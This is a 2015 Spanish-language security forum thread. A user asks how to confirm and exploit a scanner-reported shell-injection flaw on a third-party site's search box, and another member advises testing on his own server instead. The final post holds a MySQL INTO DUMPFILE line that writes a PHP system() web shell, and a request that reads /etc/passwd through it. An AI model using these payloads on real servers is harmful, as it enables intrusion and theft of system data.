Foro de elhacker.net

Seguridad Informática => Nivel Web => Mensaje iniciado por: charlymd en 26 Junio 2015, 00:26 am



Título: shell injection o falso positivo
Publicado por: charlymd en 26 Junio 2015, 00:26 am
El otro día estaba probando el buscador de una página: cuando ingresaba el carácter & me tiraba el típico error 404 de una página realizada  en asp, aunque no podría asegurar que estuviera programada en asp porque se escondía la extensión.  Más tarde, cuando testeé el sitio con Vega, el resultado fue que el buscador de la página, supuestamente, era vulnerable a Shell injection. La pregunta es obvia, ¿cómo se explota esta vulnerabilidad en asp?.
Alguien sabe cómo correr comandos desde una página asp, aunque, como dije, no estoy seguro de que esté programada en asp. Por otra parte, intenté inyectar comandos asp como, por ejemplo, response.write("Hola Mundo") pero no resultó, ahora sospecho que puede ser un falso positivo. Entonces, la pregunta sería: ¿cómo compruebo si se trata de un falso positivo? y ¿cómo exploto Shell injection?.
Desde ya, gracias.



Título: Re: shell injection o falso positivo
Publicado por: engel lex en 26 Junio 2015, 00:52 am
que tal si intentas montar en un servidor, local o como quieras, tu propia pagina en asp y pruebas las posibles vulnerabilidades antes de atacar algo a ciegas y sin conocimiento


Título: Re: shell injection o falso positivo
Publicado por: charlymd en 26 Junio 2015, 02:09 am
Soy culpable. Tengo el extraño y raro comportamiento de optar por lo más fácil.
De todas formas, tenes razón.


Título: Re: shell injection o falso positivo
Publicado por: Shell Root en 5 Julio 2015, 23:24 pm
Shell Injection no tiene que ver más con el tema de comandos hacia el servidor? No entiendo para que inyectas codigo asp.

:http://www.golemtechnologies.com/articles/shell-injection#shell-injection-overview


Título: Re: shell injection o falso positivo
Publicado por: sqln00b en 19 Julio 2015, 06:51 am
Buenas, vengo a preguntar. Según mi poca experiencia Shell Injection se refiere a subir una shell vía SQL ¿No?

Es decir ¿En MySQL el comando sería algo así?

Código:
SELECT '<?php system($_GET['cmd']) ?>' INTO DUMPFILE '/../../../shell.php'

Una vez que creé el archivo en el servidor (evidentemente en un lugar accesible) puedo llamar directamente a la shell.

Código:
localhost/shell?cmd=cat /etc/passwd

¿O es otro tipo de ataque? :-[